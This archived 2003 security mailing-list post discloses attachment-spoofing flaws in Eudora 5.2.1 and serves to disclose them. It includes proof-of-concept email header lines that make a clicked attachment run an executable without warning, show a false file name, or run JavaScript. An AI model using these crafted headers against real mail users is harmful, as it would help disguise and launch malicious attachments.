[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200305270227.h4R2RL7185441@milan.maths.usyd.edu.au>
Date: Tue, 27 May 2003 12:27:22 +1000 (EST)
From: psz@...hs.usyd.edu.au (Paul Szabo)
To: NTBugtraq@...tserv.ntbugtraq.com, bugtraq@...urityfocus.com,
full-disclosure@...ts.netsys.com
Subject: Re: Eudora 5.2.1 attachment spoof
Building on my Eudora attachment spoof
http://www.securityfocus.com/archive/1/322286
I have now found better games to play:
From: me
To: you
Ensure victim has both attachments 'calc' and 'calc.exe' (sent in
this, or previous, email). Then the following shows 'windows' icon
and runs calc.exe without warning when clicked:
Attachment Converted<CR>: attach\calc
Other mis-features I found (but I do not see how to make them into a
credible exploit):
If we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:
Attachment Converted<CR>: <A href=H:/windows/.eudora/attach/calc>file.txt</a>
Javascript done with InternetExplorer even if we set own viewer:
Attachment Converted<CR>: <A href=javascript:alert('hello')>hello.txt</a>
Replace the four-character <CR> marker with the single byte CR=0x0d in all
of above. Tested with Eudora 5.2.1 on Windows 2000.
Cheers,
Paul Szabo - psz@...hs.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists